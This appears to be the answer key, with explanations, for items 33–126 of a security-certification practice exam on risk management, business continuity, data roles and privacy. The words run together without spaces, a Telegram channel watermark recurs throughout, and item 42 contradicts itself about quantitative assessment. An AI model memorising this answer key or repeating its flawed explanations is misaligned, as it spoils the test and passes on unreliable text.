33. D. Systemsshouldberestoredwithinfourhourswithaminimumlossofoneday’sworthofdata.TheRTO(recoverytimeobjective)istheamountoftimewithinwhichaprocessorservicemustberestoredafteradisastertomeetbusinesscontinuity.Itdefineshowmuchtimeittakestorecoverafternotificationofprocessdisruption.Therecoverypointobjective,orRPO,specifiestheamountoftimethatcanpassbeforetheamountofdatalostmayexceedtheorganization’smaximumtolerancefordataloss.
34. A. Adataretentionpolicydefineshowlonganorganizationwillkeepdata.Removingsensitivedocumentsnotinuseisacleandeskpolicy.Aformalprocessformanagingconfigurationchangesischangemanagement,andamemorandumofunderstandingconsistsoflegaldocumentsthatdescribemutualagreementbetweentwoparties.
35. B. ALE(annuallossexpectancy)istheproductoftheARO(annualrateof
Telegram Channel @nettrain
occurrence)andtheSLE(singlelossexpectancy)andismathematicallyexpressedasALE=ARO×SLE.Singlelossexpectancyisthecostofanysingleloss,anditismathematicallyexpressedasSLE=AV(assetvalue)×EF(exposurefactor).
36. B. TheCenterforInternetSecurity(CIS)benchmarksproviderecommendationsforhowtosecureanoperatingsystem,application,orothercoveredtechnology.MichellewillfindWindows10–specificsecurityconfigurationguidelinesandtechniques.
37. A. Preventivecontrolslikedatabackupsareproactiveandareusedtoavoidasecuritybreachoraninterruptionofcriticalservicesbeforetheycanhappen.Securitycameras,smokedetectors,anddooralarmsareexamplesofdetectivecontrol.Detectivecontrolsdetectintrusionasithappensanduncoversaviolation.
38. C. Risktransferistheactofmovingtherisktohostedproviderswhoassumetheresponsibilityforrecoveryandrestorationorbyacquiringinsurancetocoverthecostsemergingfromarisk.Riskacceptanceisastrategyofrecognizing,identifying,andacceptingariskthatissufficientlyunlikelyorthathassuchlimitedimpactthatacorrectivecontrolisnotwarranted.Riskmitigationiswhenacompanyimplementscontrolstoreducevulnerabilitiesorweaknessesinasystem.Itcanalsoreducetheimpactofathreat.Riskavoidanceistheremovalofthevulnerabilitythatcanincreaseaparticularrisksothatitisavoidedaltogether.
39. D. Apreventivecontrolisusedtoavoidasecuritybreachoraninterruptionofcriticalservicesbeforetheycanhappen.Administrativecontrolsaredefinedthroughpolicies,procedures,andguidelines.Acompensatingcontrolisusedtosatisfyarequirementforasecuritymeasurethatistoodifficultorimpracticaltoimplementatthecurrenttime.Adeterrentcontrolisusedtodeterasecuritybreach.
40. C. Meantimebetweenfailures(MTBF)isameasurementtoshowhowreliableahardwarecomponentis.MTTR(meantimetorepair)istheaveragetimeittakesforafaileddeviceorcomponenttoberepairedorreplaced.AnRPO(recoverypointobjective)istheperiodoftimeacompanycantoleratelostdatabeingunrecoverablebetweenbackups.ALE(annuallossexpectancy)istheproductoftheannualrateofoccurrence(ARO)andthesinglelossexpectancy(SLE).
41. C. Asinglepointoffailure(SPOF)isasingleweaknessthatcanbringan
Telegram Channel @nettrain
entiresystemdownandpreventitfromworking.CloudcomputingallowsthedeliveryofhostedserviceovertheInternet.Loadbalancingspreadstrafficorotherloadbetweenmultiplesystemsorservers.VirtualizationusesasystemtohostvirtualmachinesthatsharetheunderlyingresourcessuchasRAM,harddrive,andCPU.
42. A. Quantitativeriskanalysisrequirescomplexcalculationsandismoretime-consumingbecauseitrequiresdetailedfinancialdataandcalculations.Quantitativeriskassessmentisoftensubjectiveandrequiresexpertiseonsystemsandinfrastructure,andbothtypesofassessmentcanprovideclearanswersonrisk-basedquestions.
43. D. Acustodianconfiguresdataprotectionbasedonsecuritypolicies.Thelocalcommunitybankisthedataowner,notLeighAnn.LeighAnnisanetworkadministrator,notauser,andpoweruserisnotastandardsecurityroleintheindustry.
44. B. Riskacceptanceisastrategyofrecognizing,identifying,andacceptingariskthatissufficientlyunlikelyorhassuchlimitedimpactthatacorrectivecontrolisnotwarranted.Riskmitigationiswhenacompanyimplementscontrolstoreducevulnerabilitiesorweaknessesinasystem.Itcanalsoreducetheimpactofathreat.Riskavoidanceistheremovalofthevulnerabilitythatcanincreaseaparticularrisksothatitisavoidedaltogether.Risktransferistheactofmovingtherisktootherorganizationslikeinsuranceprovidersorhostingcompanieswhoassumetheresponsibilityforrecoveryandrestorationorbyacquiringinsurancetocoverthecostsemergingfromarisk.
45. A. Dataownersassignlabelssuchastopsecrettodata.Custodiansassignsecuritycontrolstodata.Aprivacyofficerensuresthatcompaniescomplywithprivacylawsandregulations.SystemadministratorsareresponsiblefortheoverallfunctioningofITsystems.
46. C. Employeescanleakacompany’sconfidentialinformation.Exposingacompany’sinformationcouldputthecompany’ssecuritypositionatriskbecauseattackerscanusethisinformationaspartofattacksagainstthecompany.Gainingaccesstoacomputer’sMACaddressisnotrelevanttosocialmedianetworkrisk.Gainingaccesstoacomputer’sIPaddressisnotrelevanttosocialmedianetworkrisk.Employeescaneasilyexpresstheirconcernsaboutacompanyingeneral.Thisisnotrelevanttosocialmedianetworkriskaslongastheemployeedoesn’trevealanyconfidential
Telegram Channel @nettrain
information.
47. C. Separationofdutiesistheconceptofhavingmorethanonepersonrequiredtocompleteatask.Abackgroundcheckisaprocessthatisperformedwhenapotentialemployeeisconsideredforhire.Jobrotationallowsindividualstoseevariouspartsoftheorganizationandhowitoperates.Italsoeliminatestheneedforacompanytorelyononeindividualforsecurityexpertiseshouldtheemployeebecomedisgruntledanddecidetoharmthecompany.Recoveringfromadisgruntledemployee’sattackiseasierwhenmultipleemployeesunderstandthecompany’ssecurityposture.Collusionisanagreementbetweentwoormorepartiestodefraudapersonoftheirrightsortoobtainsomethingthatisprohibitedbylaw.
48. B. ALE(annuallossexpectancy)=SLE(singlelossexpectancy)×ARO(annualizedrateofoccurrence).SLEequals$750,000(2,500records×$300),andAROequals5%,so$750,000times5%equals$37,500.
49. C. RPO(recoverypointobjective)specifiestheallowabledataloss.Itistheamountoftimethatcanpassduringaninterruptionbeforethequantityofdatalostduringthatperiodsurpassesbusinesscontinuityplanning’smaximumacceptablethreshold.MTBF(meantimebetweenfailures)istheratingonadeviceorcomponentthatpredictstheexpectedtimebetweenfailures.MTTR(meantimetorepair)istheaveragetimeittakesforafaileddeviceorcomponenttoberepairedorreplaced.ARO(annualrateofoccurrence)istheratioofanestimatedpossibilitythatathreatwilltakeplacewithinaone-yeartimeframe.
50. D. Adataretentionpolicystateshowdatashouldbestoredbasedonvarioustypes,suchasstoragelocation,amountoftimethedatashouldberetained,andthetypeofstoragemediumthatshouldbeused.Acleandeskpolicyensuresthatallsensitive/confidentialdocumentsareremovedfromanend-userworkstationandlockedupwhenthedocumentsarenotinuse.AnAUP,oracceptableusepolicy,describesthelimitsandguidelinesforuserstomakeuseofanorganization’sphysicalandintellectualresources.Thisincludesallowingorlimitingtheuseofpersonalemailduringworkhours.Asecuritypolicydefineshowtosecurephysicalandinformationtechnologyassets.Thisdocumentshouldbecontinuouslyupdatedastechnologyandemployeerequirementschange.
51. C. Onboardingistheprocessofaddinganemployeetocompany’sidentityandaccessmanagementsystem.Offboardingistheprocessofremovingan
Telegram Channel @nettrain
employeefromthecompany’sidentityandaccessmanagementsystem.Asystemownerisanindividualwhoisinchargeofmanagingoneormoresystemsandcanincludepatchingandupdatingoperatingsystems.Anexecutiveuserwasmadeupforthisquestion.
52. B. Separationofdutycanbeclassifiedasanoperationalcontrolthatattemptstominimizefraudbyensuringthatanindividualcannotexploitaprocessandconcealtheerrorsorissuesthattheyarecreating.Itisnotaphysicalcontroloratechnicalcontrol,andnothinginthequestionindicatesthatthisiscompensatingforgapsleftbyanothercontrol.
53. D. TheGeneralDataProtectionRegulation(GDPR)doesnotincludearighttoanonymity,althoughorganizationsmustbeabletoprovidesecuritysafeguardsthatmayincludeanonymizationwhereappropriate.
54. D. TheNISTRMF’sprocessis.
1. Prepare
2. Categorizesystem
3. Selectcontrols
4. Implementcontrols
5. Assesscontrols
6. Authorizesystem
7. Monitorcontrols
55. B. Securityprogramadministratorsoftenusedifferenttypesoftrainingtoensurethattraineeswhoreactandresponddifferentlytotrainingaregiventrainingthathelpsthem.Theremaybeothervalidreasons,butthisisthemostcommonreasonfortrainingdiversity.
56. A. Risksthattheorganizationitselfcreatesareinternalrisks.Externalrisksarethosecreatedbyfactorsoutsidetheorganization’scontrol.Qualitativeandquantitativearebothtypesofriskassessment,ratherthancategorizationsofrisk.
57. B. Riskregistersaredocumentsusedbyorganizationstotrackandmanagerisksandincludeinformationincludingtheownerorresponsibleparty,detailsabouttherisk,andotherusefulinformation.StatementonStandardsforAttestationEngagements(SSAEs)areauditreports,PaymentCardIndustryDataSecurityStandard(PCI-DSS)isasecuritystandardusedfor
Telegram Channel @nettrain
creditcardoperations,andrisktableisnotacommonindustryterm.
58. C. Themeantimetorepair(MTTR)forasystemordevicesistheaveragetimethatitwilltaketorepairitifitfails.TheMTTRisusedaspartofbusinesscontinuityplanningtodetermineifasystemneedsadditionalredundancyorotheroptionsputinplaceifafailureandrepairwouldexceedthemaximumtolerableoutage.Itiscalculatedbydividingthetotalmaintenancetimebythetotalnumberofrepairs.MTBFisthemeantimebetweenfailures,MTTFthemeantimetofail,andMITMisanon-pathattack,atermthathasbeenincreasinglyreplacedwithon-path.
59. D. Commonresultsofbreacheslikethisincludeidentitytheftusingthepersonalinformationofthecustomers,financiallosstothecompanyduetobreachcostsandlawsuits,andreputationalloss.Sincetheincidentresponseprocessisover,Olivia’scompanyshouldhaveremediatedtheunderlyingissuesthatledtothebreach,hopefullypreventingfurtherdowntimeandthusavailabilityloss.
60. D. Thereisnocivilianclassificationlevelforgovernmentdata.Datamaybeunclassified,orsensitivebutunclassified.TopSecret,Secret,andConfidentialareallcommonlyusedclassifications.
61. B. Thesourcecodeforaproductisnottypicallyusedasalocationforprivacytermsandconditions.Instead,theyareinthecontract,userlicenseorrelatedlegalterms,orinaformalprivacynotice.
62. B. Pseudonymizationcanallowreidentificationofthedatasubjectifadditionaldataisavailable.Properlydoneanonymizationcannotbereversed.Anonymizationtechniqueswillgroupinformationsothatindividualscannotbeidentifiedfromdataanduseothertechniquestopreventadditionalinformation,leadingtode-anonymizationofindividuals.
63. A. Adatagovernancepolicyclearlystateswhoownstheinformationcollectedandusedbyanorganization.Informationsecuritypoliciesprovidethehigh-levelauthorityandguidanceforsecurityprogramsandefforts.Acceptableusepolicies(AUPs)definewhatinformationresourcescanbeusedforandhow.Dataretentionpoliciesestablishwhatinformationanorganizationwillcollectandhowlongitwillbekeptbeforedestruction.
64. C. Helenhascreatedafunctionalrecoveryplanfocusedonaspecifictechnicalandbusinessfunction.Adisasterrecoveryplan(DRP)hasabroaderperspectiveandmightincludemultiplefunctionalrecoveryplans.RPOs,orrecoverypointobjectives,andMTBF,ormeantimebetween
Telegram Channel @nettrain
failures,arenottypesofplanstypicallybuiltbyorganizations.
65. B. Healthinformationmaybecoveredbystate,local,orfederallaw,andGreg’sorganizationshouldensurethattheyunderstandanyapplicablelawsbeforestoring,processing,orhandlinghealthinformation.
66. C. Controlrisksspecificallyapplytofinancialinformation,wheretheymayimpacttheintegrityoravailabilityofthefinancialinformation.
67. D. Anindividualismostlikelytofaceidentitytheftissuesiftheirpersonallyidentifiableinformation(PII)isstolenorbreached.
68. C. ItiscommonpracticetoprohibitinteractiveloginstoaGUIorshellforserviceaccounts.Useofaserviceaccountforinteractiveloginsorattemptingtologinasoneshouldbeimmediatelyflaggedandalertedonasanindicatorofcompromise(IoC).
69. C. Assetmanagementpoliciestypicallyincludeallstagesofanasset’slifecycle,andassettagslikethosedescribedareusedtotrackassetsinmanyorganizations.Changemanagement,incidentresponse,andacceptableusepoliciesdonotrequireassettagging.
70. D. Thediagramshowsafullyredundantinternalnetworkwithpairsoffirewalls,routers,andcoreswitches,butwithasingleconnectiontotheInternet.ThismeansthatMeganshouldconsiderhowherorganizationwouldconnecttotheoutsideworldifthatlinkwasseveredordisrupted.Thereisnoindicationwhetherthisisawiredorwirelesslink,andtheimagedoesnotshowaredundantlink.
71. D. Emmashouldcategorizethisasasupplychainrisk.Whenorganizationscannotgetthesystems,equipment,andsuppliestheyneedtooperate,itcanhavesignificantimpactontheirabilitytoconductbusiness.Thatcouldcreatefinancialrisk,butfinancialriskisnotthedirectriskhere.Thereisnoindicationthatthevendorwillnotsupportthesystems,noristhereanyinformationaboutwhetherthereisanintegrationissueinthedescription.
72. A. Anintrusiondetectionsystem(IDS)candetectattacks,andisadetectivecontrol.Sinceitisatechnicalsystemratherthanaphysicalcontroloranadministrativepolicyorprocedure,Henrycancorrectlycategorizeitasatechnical,detectivecontrol.
73. C. TheFederalTradeCommission(FTC)doesnotprovidesecurityconfigurationguidesorbenchmarksforoperatingsystemsordevices.The
Telegram Channel @nettrain
CenterforInternetSecurity(CIS),Microsoft(andothervendors),andtheNationalSecurityAgency(NSA)allprovideconfigurationbenchmarks.
74. C. Legacysystemsthatnolongerreceivesupportareasignificantconcernbecausetheycannotbepatchedifsecurityvulnerabilitiesarediscovered.Windows2008reacheditsendoflifeinJanuary2020.Itranonboth32-bitand64-bitplatforms,andyoucanstillinstallmodernwebserversonit.
75. B. Patchingisaformofavoidancebecauseitworkstoremoveariskfromtheenvironment.Acceptanceofflawsthatneedpatchingwouldinvolveleavingthesoftwareunpatched;mitigationstrategiesmightincludefirewalls,intrusionpreventionsystems(IPSs),orwebapplicationfirewall(WAF)devices;andtransferenceoptionsincludethird-partyhostingorservices.
76. B. Riskheatmapsorariskmatrixcanallowanorganizationtoquicklylookatrisksandcomparethembasedontheirprobabilityandimpactorotherratingelements.Qualitativeandquantitativeriskassessmentsaretypesofassessment,notmeansofpresentingriskinformationinaneasy-to-understandformat,andriskplotsarenotacommontermusedinthefield.
77. A. ThefinesthatcanresultfromviolationorinfringementofregulationsliketheGeneralDataProtectionRegulationcanhaveasignificantimpactonanorganization,orcouldevenpotentiallyputitoutofbusiness.Duetothis,organizationswilltrackcompliancewithregulationsaspartoftheirriskposture.
78. D. Disasterrecoveryrequiresforethoughtandpreparation,responsetoissuestominimizeimpactduringadisaster,andresponseactivitiesafteradisaster.Thus,acompletedisasterrecoveryplanshouldincludeactionsthatmayorwilloccurbefore,during,andafteradisaster,andnotjusttherecoveryprocessafterthefact.
79. B. Althoughdatabreachescouldresultinterminationofacardprocessingagreement,thefactthatherorganizationisnoncompliantismostlikelytoresultinafine.PCI-DSS,orPaymentCardIndustryDataSecurityStandard,isavendorstandard,notalaw,andcriminalchargeswouldnottypicallybefiledinasituationlikethis.
80. C. TheCloudSecurityAlliance’sCloudControlMatrixmapsexistingstandardstocommoncontroldescriptionsallowingcontrolrequirementstobecomparedandvalidatedacrossmanystandardsandregulations.TheCSAreferencearchitectureisasetofstandarddesigns,andISO27001and
Telegram Channel @nettrain
ISO27002arestandardsformanaginginformationsecurity.
81. B. Gamificationmakestrainingintoagametogetmoreinvolvementandinterest.Scoringpointsandreceivingrewards,eitherin-gameorvirtually,canhaveasignificantpositiveimpactontheresponsetotraining.Capture-the-flageventsfocusontechniqueslikefindinghiddeninformationorotherwiseobtaining“flags”aspartofacontest.Phishingcampaignssendfakephishingemailstostafftoidentifyindividualswhomayfallforthem.Role-basedtrainingfocusesontrainingspecificallyfortheroleorjobthatanindividualhasorwillhave.
82. D. TheGeneralDataProtectionRegulation,orGDPR,requiresadataprotectionofficer(DPO).Theyoverseetheorganization’sdataprotectionstrategyandimplementation,andmakesurethattheorganizationcomplieswiththeGDPR.
83. D. Althoughrecoveringfromabreachcanbecostly,thelossofdatalikeintellectualpropertyincircumstancesliketheseisthemostcriticalissue.Theinstitutionislikelytosufferreputationalharmandmaynotbetrustedtoconductresearchlikethisinthefuture,leadingtoanevengreatercosttotheuniversity’sabilitytodonewresearchwiththegovernment.
84. B. Mission-essentialfunctionsaredefinedasthosefunctionsthatanorganizationmustrunthroughoutadisasterorthatmustberesumedasquicklyaspossibleafteroneiftheycannotbesustained.Theyarethecorefunctionsoftheorganizationandarekeytoitssuccessandongoingexistence.Asinglepointoffailure(SPOF)isapointwhereadevice,system,orresourcecanfailandcauseanentirefunctionororganizationtonolongerwork.Recoverytimeobjectives(RTOs)arethetimeallottedtoreturntonormalfunctionality.Corerecoveryfunctionsweremadeupforthisquestion.
85. B. ASLA(servicelevelagreement)definesthelevelofservicethecustomerexpectsfromtheserviceprovider.Thelevelofservicedefinitionsshouldbespecificandmeasurableineacharea.AnMOU(memorandumofunderstanding)isalegaldocumentthatdescribesamutualagreementbetweenparties.AnISA(interconnectionsecurityagreement)isanagreementthatspecifiesthetechnicalandsecurityrequirementsoftheinterconnectionbetweenorganizations.ABPA(businesspartnershipagreement)isalegalagreementbetweenpartners.Itestablishestheterms,conditions,andexpectationsoftherelationshipbetweenthepartners.
Telegram Channel @nettrain
86. A. Customerdatacanincludeanyinformationthatacustomeruploads,shares,orotherwiseplacesinorcreatesviaaservice.Customersmayhavecontractualsecurityguaranteesinthetermsofservice,andnotificationorotherclausesmayalsoimpactwhatRickneedstodoifthedataisbreached.PIIispersonallyidentifiableinformationlikename,address,orotherdetailsthatcanidentifyaperson.Financialinformationmayincludebills,accountbalances,andsimilardetails.Healthinformationcoversabroadrangeofdataaboutanindividual’smedicalandhealthstatusorhistory.
87. C. Theftofproprietaryinformationlikeaformulaorcodeisanexampleofintellectualproperty(IP)theft.IPtheftcanbehardertoquantifythecostofalossinmanycasesbutcanhavesignificantimpacttoanorganizationthatreliesontheIPfortheirbusiness.Externalriskisriskcreatedbyfactorsoutsidetheorganization,internalriskiscreatedbytheorganizationitselforitsdecisions,andlicensingriskexiststhroughsoftwareandothercontracts.
88. B. Thisisanexampleofapersonnelcredentialpolicysinceitappliestothestaffwhoareemployedbyhisorganization.Policieslikethishelptoensurethataccountsarenotsharedorreused.Thereisnomentionofspecificdevices,serviceaccounts,oradministrativeaccounts.
89. C. Thelikelihoodofoccurrence,orprobability,ismultipliedbytheimpacttodeterminearisk’sseverity.
90. D. Organizationscandeterminehowtheywanttodetermineassetvalue,butconsistencyisimportantinmanycases.Thus,theoriginalcost,thereplacementcost,oradepreciatedcostmaybeused.
91. A. Abusinessimpactanalysis(BIA)helpstoidentifycriticalsystemsbydeterminingwhichsystemswillcreatethelargestimpactiftheyarenotavailable.MTBFisthemeantimebetweenfailures,anRTOisarecoverytimeobjective,andanICDwasmadeupforthisquestion.
92. D. Themostcommonmeansoftransferringbreachriskistopurchasecybersecurityinsurance.Acceptingbreachesisrarelyconsideredavalidriskprocess,blamingbreachesoncompetitorsdoesnotactuallytransferrisk,andsellingdatatoanotherorganizationisnotariskhandlingprocessbutmaybeabusinessprocess.
93. B. Serviceaccountsarenottypicallyallowedtouseinteractivelogins,andthusprohibitinginteractiveloginsisacommonsecuritypolicyforthem.Limitedloginhoursorlocationsaremorecommonlyusedforemployeeaccountswhentheyshouldnotbeaccessingresourcesafterhoursorfrom
Telegram Channel @nettrain
nonworklocations.Frequentpasswordexpirationforserviceaccountsisactuallylikelytocauseaserviceoutage,andmanyserviceaccountshavecomplexpasswordsandaresetwithlongerpasswordexpirationtimeframesoraresettoneverexpire.
94. C. Thecostofabreachisanexampleoftheimpactofabreach.Probabilityishowlikelytheriskistooccur,andriskseverityiscalculatedbymultiplyingprobabilityandimpact.
95. B. Seanisconductingasiteriskassessmentthatwillhelphimunderstandandcommunicatetherisksthatthesiteitselfhas.IfthelocationisinaFEMA-identifiedfloodplain,orifthereareconcernsabouttornadoesorothernaturaldisasters,thoseneedtobetakenintoaccountastheorganizationmakesitsdecisionsaboutthelocation.ABIAidentifiesmission-criticalfunctionsandthesystemsthatsupportthem.Crimepreventionthroughenvironmentaldesignisadesignconceptthatusesthedesignoffacilitiestoreducethelikelihoodofcriminalactionsthroughuseoflightingandothercontrols.Businesscontinuityplanningfocusesonhowtokeepanorganizationoperatingdespitedisruptions.
96. D. SOC2engagementassessesthesecurityandprivacycontrolsthatareinplace,andaType2reportprovidesinformationontheauditor’sassessmentoftheeffectivenessofthecontrolsthatareinplace.AnSOC1reportassessesthecontrolsthatimpacttheaccuracyoffinancialreporting.Type1reportsareviewauditor’sopinionofthedescriptionprovidedbymanagementaboutthesuitabilityofthecontrolsasdesigned.Theydonotlookattheactualoperatingeffectivenessofthecontrols.
97. B. Ensuringthatleadershipthroughoutanorganizationisawareoftheriskstheorganizationfacesandthattheyareregularlyupdatingandprovidingfeedbackonthoseriskshelpsincreaseriskawareness.Inherentriskisriskthatexistsbeforecontrolsareinplace,andresidualriskisriskthatremainsaftercontrolsareinplace.Riskappetiteistheriskthatanorganizationiswillingtotakeaspartofdoingbusiness.
98. C. Statelawsoftenincludebreachnotificationthresholdsandrequirementsthatorganizationsmustfollow.Laurashouldensurethatsheisbothawareofthebreachlawsforherstateandanyotherstatesorcountrieshercompanyoperatesin,andthatherincidentresponseplanshaveappropriateprocessesinplaceifabreachoccurs.OrganizationsthatprocessdatalikeSSNsareunlikelytodeletethemevenifabreachoccurs,
Telegram Channel @nettrain
reclassifyingdatawouldnothelpunlessthedatawasimproperlyclassifiedbeforethebreach,anddataminimizationplansareusedtolimithowmuchdataanorganizationhas,nottorespondtoabreachdirectly.
99. C. Nondisclosureagreements(NDAs)aresignedbyanemployeeatthetimeofhiring,andtheyimposeacontractualobligationonemployeestomaintaintheconfidentialityofinformation.Disclosureofinformationcanleadtolegalramificationsandpenalties.NDAscannotensureadecreaseinsecuritybreaches.Ajobrotationpolicyisthepracticeofmovingemployeesbetweendifferenttaskstopromoteexperienceandvariety.Separationoftieshasmorethanonepersonrequiredtocompleteatask.Mandatoryvacationpolicyisusedbycompaniestodetectfraudbyhavingasecondperson,familiarwiththeduties,helpdiscoveranyillicitactivities.
100. B. Oliviashouldestablishaservicelevelagreement(SLA)withherprovidertoensurethattheymeettheexpectedlevelofservice.Iftheydon’t,financialorotherpenaltiesaretypicallyincluded.OliviashouldensurethatthosepenaltiesaremeaningfultohervendortomakesuretheyaremotivatedtomeettheSLA.AnMOUisamemorandumofunderstandingandexplainstherelationshipbetweentwoorganizations;anMSAisamasterservicesagreement,whichestablishesabusinessrelationshipunderwhichadditionalworkordersorotherdocumentationdescribetheactualworkthatisdone;andaBPAisabusinesspartnershipagreement,whichisusedwhencompanieswishtopartneroneffortsandmayoutlinedivisionofprofitsorresponsibilitiesinthepartnership.
101. D. Themostaccurateriskdescriptorforthisissoftwarecompliance.Althoughthisisaninternalrisk,softwarecompliancefullydescribestheissue.Intellectualproperty(IP)theftriskoccurswhenanorganization’sintellectualpropertyisstolen,notwhenlicenseviolationsforthirdpartiesoccurs.Thisisnotalegacysystem,oratleastitwasnotdescribedthatwayinthequestion.
102. D. Inherentriskistheriskthatanorganizationfacesbeforecontrolsareputinplace.Withoutriskassessmentandcontrolsinplace,Garymustfirstdealwiththeinherentriskstheorganizationhasasitexiststoday.Residualriskistheriskthatisleftaftercontrolsareputinplace.Thetheftofintellectualproperty(IP)likealgorithms,formulas,andprocessesareIPrisks,andmultipartyriskisriskthatimpactsmorethanonegroup,company,orperson.
Telegram Channel @nettrain
103. A. Thesinglelossexpectancy(SLE)describeswhatasingleriskeventislikelytocost.Itiscalculatedusingtheassetvalue(AV)timestheexposurefactor(EF),whichisanestimatedpercentageofthecostthatwilloccurindamageifthelossoccurs.MTTRisthemeantimetorestore,AROistheannualrateofoccurrence,andRTOistherecoverytimeobjective.ThesearenotpartoftheSLEequation.
104. C. Third-partycredentialpoliciesaddresshowcontractorsandconsultantscredentialsarehandled.Thismayrequiresponsorshipbyaninternalstaffmember,additionalcontrolsregardingpasswordresetsorchanges,andshorterlifespans,amongothercontrolsandrequirements.
105. B. Annualrateofoccurrence(ARO)isexpressedasthenumberoftimesaneventwilloccurinayear.Waynehasestimatedthattheriskeventthatisbeingassessedwillhappenthreetimesayear.
106. D. Althoughhumanscancreatefiresorfloods,industrialaccidentsaretheonlyitemonthelistthatareexclusivelyperson-madedisasters.
107. C. Informationonawebsitemadeavailabletocustomersistypicallyclassifiedaspublicinformationbecauseitiseasilyavailableandintentionallyexposedtothem.Confidential,sensitive,orcriticalinformationisunlikelytobeexposedtocustomerswithoutaspecificdatahandlingagreementandadditionalsecuritylayers.
108. D. Dataprocessorsareserviceprovidersthatprocessdatafordatacontrollers.Adatacontrollerordataowneristheorganizationorindividualwhocollectsandcontrolsdata.Adatastewardcarriesouttheintentofthedatacontrollerandisdelegatedresponsibilityforthedata.Datacustodiansarethosewhoareentrustedwiththedatatostore,manage,orsecurethedata.
109. D. Datamaskingpartiallyredactssensitivedatabyreplacingsomeorallinformationinasensitivedatafieldwithblanksorotherreplacementcharacters.Tokenizationreplacessensitivedatawithuniqueidentifiersusingalookuptable.Hashingperformsaone-wayfunctiononavaluetogetauniquehash,andencryptionprotectsdatausinganalgorithmthatcanbereversedtorestoretheoriginaldatawhileallowingforconfidentialityandintegrityvalidation.
110. C. TheCloudSecurityAlliance’sreferencearchitectureincludesinformationabouttoolsinavendor-neutralmanner.CISprovidesvendorspecificbenchmarksforAWS,Azure,andOracle’scloudofferings.The
Telegram Channel @nettrain
InternationalOrganizationforStandardization(ISO)andtheNationalInstituteofStandardsandTechnology(NIST)donotofferthistypeofresource.
111. C. Locksarephysicalcontrols.Anexampleofamanagerialcontrolwouldbeapolicyorpractice,atechnicalcontrolcanincludethingslikefirewallsorantivirus,andcorrectivecontrolsareputinplacetoensurethataproblemorgapinanothercontrolisfixed.
112. C. Controlriskisatermusedinpublicaccounting.Itistheriskthatarisesfromapotentiallackofinternalcontrolswithinanorganizationthatmaycauseamaterialmisstatementintheorganization’sfinancialreports.Inthiscase,thelackofcontrolsthatwouldvalidatethefinancialsystem’sdataandfunctionisacontrolrisk.
113. C. Althoughfires,oilspills,andwarsareallpotentialexamplesofperson-madedisasters,hurricanesremainsolelyanaturaldisaster.Somedisasterscouldbeeitheraperson-madeornaturaldisaster.Forexample,firescanbecausedbyhumansorbynature,ascanfloods,andevenchemicalspillswhenanearthquakeoccurs.
114. C. ConfidentialinformationisclassifiedbytheU.S.governmentasinformationthatrequiressomeprotectionandthatifdisclosedwithoutauthorization,wouldcauseidentifiableharmtonationalsecurity.TopSecretinformationrequiresthehighestdegreeofprotectionandwouldcauseexceptionallygraveharmifexposedwithoutauthorization.Secretinformationrequiresasubstantialdegreeofprotectionandwouldcauseseriousdamageifexposed.BusinessSensitiveisnotaU.S.governmentclassificationbutisatermcommonlyusedinbusinesses.
115. C. Phonenumbersuniquelyidentifyindividuals,makingthemanexampleofpersonallyidentifiableinformation,orPII.PHIisprotectedhealthinformation,financialinformationincludesfinancialrecordsofalltypes,andgovernmentinformationisinformationthatbelongstothegovernmentormaybeclassifiedbythegovernmentandentrustedtoanorganization.
116. B. Tokenizationisanidealoptionforthisscenario.Tokenizationreplacesasensitivevaluewithanalternatevaluethatcanbelookedupinatablewhenthevalueneedstobereferencedbacktoitsoriginalform.Encryptiondoesnotmeetthisneed,datamaskingonlyhidespartofthevalue,anddatawashingisnotacommonlyusedtermfortechniquesofthisnature.
117. C. Privacynoticesareoftenincludedonwebsitestomeettherequirements
Telegram Channel @nettrain
oflawsorregulationsliketheGeneralDataProtectionRegulation(GDPR)orstateprivacylaws.
118. C. Nicoleisadatacontroller,sometimescalledadataowner.Shedeterminesthereasonsforprocessingpersonalinformationandhowitisprocessed.Adatastewardcarriesouttheintentsofthedatacontroller,datacustodiansarechargedwithsafeguardinginformation,anddataconsumerisnotacommondataprivacyrole.
119. B. Thisisaninternaldisaster—oneinwhichinternalissueshaveledtoaproblem.Anexternaldisasterwouldbecausedbyforcesoutsidetheorganizationlikeanaturaldisaster,maliciousactivity,orotheroutsideforces.AnRTO,orrecoverytimeobjective,isnotatypeofdisaster,andanMROdisasterwasmadeupforthisquestion.
120. C. Minimizingtheamountofdatathatiscollectedisthefirststepinensuringthatorganizationscanhandlethevolumeandtypesofdatathattheyworkwith.Afterthat,classifyingitandthendetermininghowlongyouretainitarealsoimportantpartsofthedatalifecycle.
121. D. KirkhasmitigatedtherisktohisorganizationbyincreasingtheresourcestargetedbytheDoSattackinanattempttoensurethattheattackwillnotbesuccessful.Acceptancewouldinvolvesimplylettingtheattacksoccurknowingtheyarelikelytostop,avoidancemightinvolvefindingawaytoensuretheattackscannotoccur,andtransfercouldleverageathird-partymirrororanti-DoShostingservice.
122. A. Amultipartyriskinvolvesmultipleorganizations.Sincetherearemultiplecustomersandorganizationsinvolved,thisisanexampleofmultipartyrisk.Aninternalriskoriginatesinsideanorganization—instead,thisisanexternalrisk.Alegacysystemriskiscreatedbyasystemorprocessthatisnolongersupportedorupdated.Anintellectualproperty(IP)theftriskoccurswhenproprietaryinformationortradesecretsmightbeexposedorlost.
123. B. EOL,orendoflife,occurswhenaserviceorsystemisnolongersupported,available,ordoesnotfunction.Natashaneedstoplantotransitionsmoothlyawayfromtheservice,eithertoareplacementserviceortostopusingtheserviceitself.AnMOUisamemorandumofunderstanding,andanNDAisanondisclosureagreement,neitherofwhichisdirectlyrelevanthere.AlastwillandtestamentisnotusedforaserviceEOL.
Telegram Channel @nettrain
124. C. TheCenterforInternetSecurity(CIS)providesawiderangeofOS,application,server,andotherbenchmarks.MicrosoftprovidesbenchmarksfortheirownoperatingsystemsbutdoesnotprovideLinuxbenchmarks.TheNationalInstituteofStandardsandTechnology(NIST)doesnotprovidebenchmarks,buttheNationalSecurityAgency(NSA)does.
125. C. Offboardingprocessesareconductedtoensurethataccountsandaccessisremovedandthatmaterials,computers,anddataareallrecoveredfromthestaffmemberwhenamemberofanorganizationleaves.ExitinterviewsareanHRprocess,jobrotationhelpstopreventanindividualfromconductingfraudulentactivitiesovertime,andgovernancehelpstomanageandmaintaindatabyestablishinghighlevelcontrolovertheprocesses,procedures,andclassificationofthedataanorganizationuses.
126. D. Public,private,sensitive,confidential,critical,andproprietaryareallcommonlyuseddataclassificationlabelsforbusiness.Secret,however,ismorecommonlyusedingovernmentclassificationschemes.
